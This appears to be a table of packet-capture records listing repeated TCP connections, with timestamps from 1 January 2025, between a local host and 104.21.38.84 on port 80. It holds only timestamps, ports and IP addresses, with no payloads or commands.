                                                                                                                  Jan 1, 2025 15:04:07.530394077 CET8050167104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:07.571500063 CET5016680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:07.648410082 CET8050167104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:07.696957111 CET5016780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:07.779534101 CET8050166104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:07.821985006 CET5016680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:07.914948940 CET8050167104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:07.962604046 CET5016780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:08.037355900 CET5016780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:08.037386894 CET5016880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:08.037389994 CET5016680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:08.042256117 CET8050168104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:08.042460918 CET8050167104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:08.042615891 CET5016780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:08.042618990 CET5016880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:08.042618990 CET5016880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:08.042778015 CET8050166104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:08.047434092 CET8050168104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:08.052340031 CET5016680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:08.403424025 CET5016880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:08.408355951 CET8050168104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:08.507045984 CET8050168104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:08.651040077 CET5016880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:08.771961927 CET8050168104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:08.898572922 CET5016980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:08.898591995 CET5016880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:08.903652906 CET8050169104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:08.903831005 CET8050168104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:08.903930902 CET5016980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:08.903943062 CET5016880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:08.904086113 CET5016980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:08.908925056 CET8050169104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:09.259568930 CET5016980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:09.264630079 CET8050169104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:09.349278927 CET8050169104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:09.400094032 CET5016980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:09.613908052 CET8050169104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:09.614201069 CET5016980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:09.619246006 CET8050169104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:09.619329929 CET5016980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:09.744877100 CET5017080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:09.749835968 CET8050170104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:09.749893904 CET5017080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:09.750001907 CET5017080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:09.754765987 CET8050170104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:10.108381987 CET5017080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:10.113365889 CET8050170104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:10.224860907 CET8050170104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:10.276437044 CET5017080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:10.488158941 CET8050170104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:10.540930986 CET5017080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:10.619549990 CET5017180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:10.620325089 CET5017080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:10.624564886 CET8050171104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:10.624665976 CET5017180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:10.625011921 CET5017180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:10.625294924 CET8050170104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:10.625379086 CET5017080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:10.629862070 CET8050171104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:10.982471943 CET5017180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:10.987970114 CET8050171104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:11.073214054 CET8050171104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:11.218410969 CET5017180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:11.322413921 CET8050171104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:11.449255943 CET5017180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:11.450145960 CET5017280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:11.454397917 CET8050171104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:11.454451084 CET5017180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:11.454991102 CET8050172104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:11.455049992 CET5017280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:11.455147982 CET5017280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:11.459886074 CET8050172104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:11.806627989 CET5017280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:11.811646938 CET8050172104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:11.903129101 CET8050172104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:11.947107077 CET5017280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:12.156830072 CET8050172104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:12.198421001 CET5017280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:12.270371914 CET5017280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:12.270425081 CET5017380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:12.275305986 CET8050173104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:12.275384903 CET5017380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:12.275476933 CET8050172104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:12.275582075 CET5017280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:12.279094934 CET5017380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:12.283916950 CET8050173104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:12.638561010 CET5017380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:12.643543005 CET8050173104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:12.744656086 CET8050173104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:12.807858944 CET5017380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:12.807859898 CET5017480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:12.812794924 CET8050174104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:12.812889099 CET8050173104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:12.814460039 CET5017480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:12.814464092 CET5017380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:12.814611912 CET5017480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:12.819417953 CET8050174104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:12.930794001 CET5017580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:12.935715914 CET8050175104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:12.938415051 CET5017580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:12.938724041 CET5017580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:12.943516016 CET8050175104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:13.166589022 CET5017480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:13.171590090 CET8050174104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:13.171689987 CET8050174104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:13.269239902 CET8050174104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:13.290822983 CET5017580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:13.296978951 CET8050175104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:13.352127075 CET5017480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:13.391868114 CET8050175104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:13.446985006 CET5017580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:13.537374020 CET8050174104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:13.654843092 CET8050175104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:13.696978092 CET5017580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:13.701644897 CET5017480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:13.776010990 CET5017480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:13.776091099 CET5017580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:13.777147055 CET5017680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:13.781097889 CET8050174104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:13.781152010 CET5017480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:13.781411886 CET8050175104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:13.781454086 CET5017580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:13.781965971 CET8050176104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:13.782021046 CET5017680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:13.782145023 CET5017680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:13.786905050 CET8050176104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:14.134843111 CET5017680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:14.139748096 CET8050176104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:14.284322023 CET8050176104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:14.453497887 CET8050176104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:14.454698086 CET5017680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:14.570597887 CET5017780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:14.575448990 CET8050177104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:14.575567007 CET5017780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:14.575702906 CET5017780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:14.580504894 CET8050177104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:14.934767008 CET5017780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:14.939799070 CET8050177104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:15.038559914 CET8050177104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:15.087600946 CET5017780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:15.207262993 CET8050177104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:15.259485006 CET5017780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:15.297622919 CET8050177104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:15.353241920 CET5017780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:15.817841053 CET5017780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:15.818896055 CET5017880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:15.822992086 CET8050177104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:15.823051929 CET5017780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:15.823756933 CET8050178104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:15.823816061 CET5017880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:15.823991060 CET5017880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:15.828778028 CET8050178104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:16.181701899 CET5017880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:16.186659098 CET8050178104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:16.272021055 CET8050178104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:16.322534084 CET5017880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:16.444716930 CET8050178104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:16.494637966 CET5017880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:16.567586899 CET5017980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:16.567590952 CET5017880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:16.573072910 CET8050179104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:16.573270082 CET8050178104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:16.573362112 CET5017880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:16.573457003 CET5017980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:16.573731899 CET5017980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:16.578676939 CET8050179104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:16.934551001 CET5017980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:16.940342903 CET8050179104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:17.046489954 CET8050179104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:17.166764975 CET5017980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:17.309509039 CET8050179104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:17.413125992 CET5017980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:17.432605028 CET5017980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:17.434118032 CET5018080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:17.437644005 CET8050179104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:17.437695026 CET5017980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:17.438906908 CET8050180104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:17.438961983 CET5018080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:17.439115047 CET5018080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:17.443944931 CET8050180104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:17.790858984 CET5018080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:17.795840025 CET8050180104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:17.901880026 CET8050180104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:17.962632895 CET5018080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:18.161998034 CET8050180104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:18.218425989 CET5018080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:18.519834995 CET5017680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:18.524373055 CET5018180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:18.524415016 CET5018080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:18.529226065 CET8050181104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:18.529743910 CET8050180104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:18.533745050 CET5018180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:18.533751011 CET5018080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:18.536366940 CET5018180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:18.541208982 CET8050181104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:18.542140007 CET5018180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:18.544387102 CET5018280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:18.550137997 CET8050182104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:18.550260067 CET5018280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:18.550353050 CET5018280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:18.556515932 CET8050182104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:18.587667942 CET8050181104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:18.664361954 CET5018380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:18.669305086 CET8050183104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:18.672554970 CET5018380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:18.672744989 CET5018380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:18.677884102 CET8050183104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:18.891060114 CET8050181104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:18.891347885 CET5018180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:18.900279999 CET5018280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:18.905131102 CET8050182104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:18.905245066 CET8050182104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:18.993911028 CET8050182104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:19.025226116 CET5018380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:19.030097008 CET8050183104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:19.081254005 CET5018280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:19.116945028 CET8050183104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:19.165752888 CET5018380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:19.168699980 CET8050182104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:19.237869024 CET5018280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:19.380078077 CET8050183104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:19.431397915 CET5018380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:19.508956909 CET5018280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:19.509164095 CET5018380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:19.510643959 CET5018480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:19.514091969 CET8050182104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:19.514147043 CET5018280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:19.514345884 CET8050183104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:19.514411926 CET5018380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:19.515480995 CET8050184104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:19.515537977 CET5018480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:19.515642881 CET5018480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:19.520363092 CET8050184104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:19.869175911 CET5018480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:19.874080896 CET8050184104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:19.960407972 CET8050184104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:20.056476116 CET5018480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:20.134418964 CET8050184104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:20.256601095 CET5018580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:20.260371923 CET5018480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:20.261526108 CET8050185104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:20.264426947 CET5018580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:20.264553070 CET5018580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:20.269381046 CET8050185104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:20.620373011 CET5018580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:20.625334978 CET8050185104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:20.721647024 CET8050185104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:20.776371956 CET5018580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:20.988723993 CET8050185104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:21.041348934 CET5018580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:21.130166054 CET5018480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:21.136708975 CET5018580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:21.137631893 CET5018680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:21.141797066 CET8050185104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:21.141849995 CET5018580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:21.142431974 CET8050186104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:21.142486095 CET5018680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:21.142566919 CET5018680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:21.147339106 CET8050186104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:21.494402885 CET5018680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:21.499360085 CET8050186104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:21.625950098 CET8050186104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:21.665756941 CET5018680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:21.891782999 CET8050186104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:21.947040081 CET5018680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:22.005825043 CET5018680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:22.005825043 CET5018780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:22.011147976 CET8050187104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:22.011240959 CET5018780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:22.011354923 CET5018780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:22.011425018 CET8050186104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:22.011492014 CET5018680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:22.016120911 CET8050187104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:22.369313002 CET5018780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:22.374155998 CET8050187104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:22.467606068 CET8050187104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:22.644637108 CET8050187104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:22.647030115 CET5018780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:22.772207975 CET5018880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:22.772208929 CET5018780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:22.777127028 CET8050188104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:22.777306080 CET8050187104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:22.777478933 CET5018780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:22.777478933 CET5018880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:22.777748108 CET5018880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:22.782562017 CET8050188104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:23.139975071 CET5018880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:23.144844055 CET8050188104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:23.232151031 CET8050188104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:23.275145054 CET5018880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:23.509677887 CET8050188104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:23.556405067 CET5018880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:23.632354975 CET5018880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:23.633198023 CET5018980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:23.637469053 CET8050188104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:23.637523890 CET5018880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:23.638066053 CET8050189104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:23.638129950 CET5018980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:23.638276100 CET5018980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:23.642997026 CET8050189104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:23.994330883 CET5018980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:23.999250889 CET8050189104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:24.094259977 CET8050189104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:24.150156021 CET5018980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:24.184901953 CET5018980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:24.184916019 CET5019080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:24.189821005 CET8050190104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:24.190006971 CET8050189104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:24.192441940 CET5018980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:24.192452908 CET5019080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:24.192574978 CET5019080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:24.197310925 CET8050190104.21.38.84192.168.2.4
